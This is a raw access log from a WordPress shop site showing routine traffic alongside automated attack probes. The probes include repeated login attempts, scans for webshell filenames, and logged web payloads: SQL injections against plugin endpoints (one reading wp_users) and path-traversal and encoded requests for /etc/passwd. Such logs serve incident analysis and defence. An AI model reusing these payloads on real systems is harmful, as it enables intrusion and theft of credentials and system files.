77.81.65.203 - - [28/Apr/2026:01:01:35 +0000] "GET //the-muscle-building.info/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; U; Android 1.5; en-us; sdk Build/CUPCAKE) AppleWebkit/528.5  (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1"
77.81.65.203 - - [28/Apr/2026:01:01:35 +0000] "GET //the-muscle-building.info/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js HTTP/1.1" 301 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Mobile/14G60 MicroMessenger/7.0.5(0x17000523) NetType/4G Language/zh_CN"
77.81.65.203 - - [28/Apr/2026:01:01:35 +0000] "GET //the-muscle-building.info/wp-content/themes/neve/assets/js/build/modern/frontend.js HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
77.81.65.203 - - [28/Apr/2026:01:01:35 +0000] "GET //the-muscle-building.info/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 8.1.0; vivo 1726) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36"
77.81.65.203 - - [28/Apr/2026:01:01:35 +0000] "GET //the-muscle-building.info/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js HTTP/1.1" 301 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1"
77.81.65.203 - - [28/Apr/2026:01:01:35 +0000] "GET //the-muscle-building.info/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 9; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
77.81.65.203 - - [28/Apr/2026:01:01:35 +0000] "GET //the-muscle-building.info/wp-includes/js/jquery/jquery-migrate.min.js HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)"
77.81.65.203 - - [28/Apr/2026:01:01:35 +0000] "GET //the-muscle-building.info/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js HTTP/1.1" 301 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
77.81.65.203 - - [28/Apr/2026:01:01:35 +0000] "GET //the-muscle-building.info/wp-content/themes/neve/assets/js/build/modern/scroll-to-top.js HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 9; HMA-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
77.81.65.203 - - [28/Apr/2026:01:01:35 +0000] "GET //the-muscle-building.info/wp-includes/js/jquery/jquery.min.js HTTP/1.1" 301 - "-" "SAMSUNG-S8000/S8000XXIF3 SHP/VPP/R5 Jasmine/1.0 Nextreaming SMM-MMS/1.2.0 profile/MIDP-2.1 configuration/CLDC-1.1 FirePHP/0.3"
77.81.65.203 - - [28/Apr/2026:01:01:35 +0000] "GET //the-muscle-building.info/xmlrpc.php HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 9; Redmi Note 5 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
77.81.65.203 - - [28/Apr/2026:01:01:35 +0000] "GET //the-muscle-building.info/wp-admin/admin-ajax.php HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; U; Android 8.1.0; en-us; Redmi 5 Plus Build/OPM1.171019.019) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/10.9.7-g"
77.81.65.203 - - [28/Apr/2026:01:01:35 +0000] "GET //the-muscle-building.info/wp-includes/js/wp-emoji-loader.min.js HTTP/1.1" 301 - "-" "Opera/7.51 (Windows NT 5.1; U) [en]"
77.81.65.203 - - [28/Apr/2026:01:01:35 +0000] "GET /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G975F Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36"
184.94.212.206 - - [28/Apr/2026:01:04:09 +0000] "POST /wp-cron.php?doing_wp_cron=1777338249.6492080688476562500000 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
194.5.48.191 - - [28/Apr/2026:01:04:08 +0000] "POST /xmlrpc.php HTTP/1.1" 404 58047 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0 Safari/537.36"
184.94.212.206 - - [28/Apr/2026:01:04:09 +0000] "POST /wp-cron.php?doing_wp_cron=1777338249.9064140319824218750000 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
194.5.48.193 - - [28/Apr/2026:01:04:08 +0000] "POST /xmlrpc.php HTTP/1.1" 404 58047 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0 Safari/537.36"
184.94.212.206 - - [28/Apr/2026:01:06:16 +0000] "POST /wp-cron.php?doing_wp_cron=1777338376.8558459281921386718750 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
213.55.96.154 - - [28/Apr/2026:01:06:15 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko"
213.55.96.154 - - [28/Apr/2026:01:06:17 +0000] "POST /wp-login.php HTTP/1.1" 200 2017 "https://the-muscle-building.info/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko"
184.94.212.206 - - [28/Apr/2026:01:06:56 +0000] "POST /wp-cron.php?doing_wp_cron=1777338416.1348960399627685546875 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
154.0.167.225 - - [28/Apr/2026:01:06:54 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50"
154.0.167.225 - - [28/Apr/2026:01:06:56 +0000] "POST /wp-login.php HTTP/1.1" 200 2017 "https://the-muscle-building.info/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50"
184.94.212.206 - - [28/Apr/2026:01:09:43 +0000] "POST /wp-cron.php?doing_wp_cron=1777338583.8651599884033203125000 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
20.100.183.137 - - [28/Apr/2026:01:09:40 +0000] "GET /inputs.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:09:44 +0000] "GET /ioxi-o.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:09:45 +0000] "GET /function/function.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:09:46 +0000] "GET /rip.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:09:47 +0000] "GET /admin.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:09:49 +0000] "GET /wp-content/uploads/index.php HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:09:49 +0000] "GET /cache.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:09:51 +0000] "GET /themes.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:09:52 +0000] "GET /an.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:09:53 +0000] "GET /index/function.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:09:55 +0000] "GET /randkeyword.PhP7 HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:09:56 +0000] "GET /ws.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:09:57 +0000] "GET /404.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:09:58 +0000] "GET /wp-admin/user.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:09:59 +0000] "GET /wp-conf.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:00 +0000] "GET /wp-content/themes/hideo/network.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:02 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:03 +0000] "GET /abc.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:05 +0000] "GET /abcd.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:06 +0000] "GET /as.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:07 +0000] "GET /wp-trackback.php HTTP/1.1" 404 130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:08 +0000] "GET /about.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:10 +0000] "GET /file.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:11 +0000] "GET /adminfuns.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:12 +0000] "GET /wp-good.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:14 +0000] "GET /xmlrpc.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:15 +0000] "GET /goods.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:16 +0000] "GET /class-t.api.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:17 +0000] "GET /sf.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:19 +0000] "GET /kbfr.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:20 +0000] "GET /autoload_classmap.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:21 +0000] "GET /chosen.php?p= HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:22 +0000] "GET /classwithtostring.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:23 +0000] "GET /defaults.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:24 +0000] "GET /.well-known/ HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:26 +0000] "GET /info.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:27 +0000] "GET /cgi-bin/ HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:28 +0000] "GET /wp-includes/Requests/src/Response/about.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:29 +0000] "GET /wp-includes/html-api/ HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:30 +0000] "GET /wp-content/admin.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:31 +0000] "GET /wp-admin/css/colors/ectoplasm/ HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:32 +0000] "GET /wp-content/uploads/ HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:34 +0000] "GET /wp-content/themes/admin.php HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:35 +0000] "GET /wp-content/themes/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:35 +0000] "GET /wp-content/plugins/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:35 +0000] "GET /wp-includes/PHPMailer/ HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:36 +0000] "GET /wp-includes/images/ HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.100.183.137 - - [28/Apr/2026:01:10:38 +0000] "GET /wp-content/plugins/WordPressCore/ HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
184.94.212.206 - - [28/Apr/2026:01:11:20 +0000] "POST /wp-cron.php?doing_wp_cron=1777338680.0241279602050781250000 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
45.129.231.10 - - [28/Apr/2026:01:11:18 +0000] "GET / HTTP/1.1" 200 14620 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15"
184.94.212.206 - - [28/Apr/2026:01:14:37 +0000] "POST /wp-cron.php?doing_wp_cron=1777338877.6267020702362060546875 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
45.129.231.10 - - [28/Apr/2026:01:14:35 +0000] "GET /index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20- HTTP/1.1" 404 117 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
184.94.212.206 - - [28/Apr/2026:01:17:49 +0000] "POST /wp-cron.php?doing_wp_cron=1777339069.3935570716857910156250 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
134.209.100.212 - - [28/Apr/2026:01:17:48 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (X11; CrOS x86_64 10575.55.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
134.209.100.212 - - [28/Apr/2026:01:17:49 +0000] "POST /wp-login.php HTTP/1.1" 200 2017 "https://the-muscle-building.info/wp-login.php" "Mozilla/5.0 (X11; CrOS x86_64 10575.55.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
184.94.212.206 - - [28/Apr/2026:01:20:20 +0000] "POST /wp-cron.php?doing_wp_cron=1777339220.2280979156494140625000 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
52.142.36.7 - - [28/Apr/2026:01:20:18 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0"
52.142.36.7 - - [28/Apr/2026:01:20:20 +0000] "POST /wp-login.php HTTP/1.1" 200 2017 "https://the-muscle-building.primemusicproductions.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0"
184.94.212.206 - - [28/Apr/2026:01:23:17 +0000] "POST /wp-cron.php?doing_wp_cron=1777339397.6156909465789794921875 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
45.129.231.10 - - [28/Apr/2026:01:23:15 +0000] "GET /wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ== HTTP/1.1" 400 21 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.17"
184.94.212.206 - - [28/Apr/2026:01:23:55 +0000] "POST /wp-cron.php?doing_wp_cron=1777339435.2528610229492187500000 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
45.129.231.10 - - [28/Apr/2026:01:23:54 +0000] "GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1" 404 117 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36"
171.111.192.222 - - [28/Apr/2026:01:24:29 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36"
184.94.212.206 - - [28/Apr/2026:01:30:07 +0000] "POST /wp-cron.php?doing_wp_cron=1777339807.6076829433441162109375 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
45.129.231.10 - - [28/Apr/2026:01:30:05 +0000] "GET /my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15"
45.129.231.10 - - [28/Apr/2026:01:30:08 +0000] "GET /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1" 301 - "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
184.94.212.206 - - [28/Apr/2026:01:31:51 +0000] "POST /wp-cron.php?doing_wp_cron=1777339911.4976780414581298828125 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
167.99.177.109 - - [28/Apr/2026:01:31:50 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
167.99.177.109 - - [28/Apr/2026:01:31:51 +0000] "POST /wp-login.php HTTP/1.1" 200 2017 "https://the-muscle-building.info/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
184.94.212.206 - - [28/Apr/2026:01:39:21 +0000] "POST /wp-cron.php?doing_wp_cron=1777340361.1542389392852783203125 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
45.129.231.10 - - [28/Apr/2026:01:39:19 +0000] "GET / HTTP/1.1" 200 14620 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/608.2.11 (KHTML, like Gecko) Version/13 Safari/608.2.11"
184.94.212.206 - - [28/Apr/2026:01:41:11 +0000] "POST /wp-cron.php?doing_wp_cron=1777340471.1127629280090332031250 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
45.129.231.10 - - [28/Apr/2026:01:41:09 +0000] "GET /index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20- HTTP/1.1" 404 117 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8.1 Mobile/15E148 Safari/604.1"
184.94.212.206 - - [28/Apr/2026:01:43:24 +0000] "POST /wp-cron.php?doing_wp_cron=1777340604.2013089656829833984375 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
190.107.177.252 - - [28/Apr/2026:01:43:22 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0)"
190.107.177.252 - - [28/Apr/2026:01:43:24 +0000] "POST /wp-login.php HTTP/1.1" 200 2017 "https://the-muscle-building.info/wp-login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0)"
184.94.212.206 - - [28/Apr/2026:01:49:46 +0000] "POST /wp-cron.php?doing_wp_cron=1777340986.0355091094970703125000 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
45.129.231.10 - - [28/Apr/2026:01:49:44 +0000] "GET /?filename=../../../../../../etc/passwd&mphb_action=download HTTP/1.1" 301 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15"
45.129.231.10 - - [28/Apr/2026:01:49:44 +0000] "GET /wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ== HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Safari/605.1.15"
45.129.231.10 - - [28/Apr/2026:01:49:44 +0000] "GET /wp-content/plugins/form-maker/readme.txt HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"
184.94.212.206 - - [28/Apr/2026:01:51:47 +0000] "POST /wp-cron.php?doing_wp_cron=1777341107.7736599445343017578125 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
50.6.229.148 - - [28/Apr/2026:01:51:46 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MAARJS; rv:11.0) like Gecko"
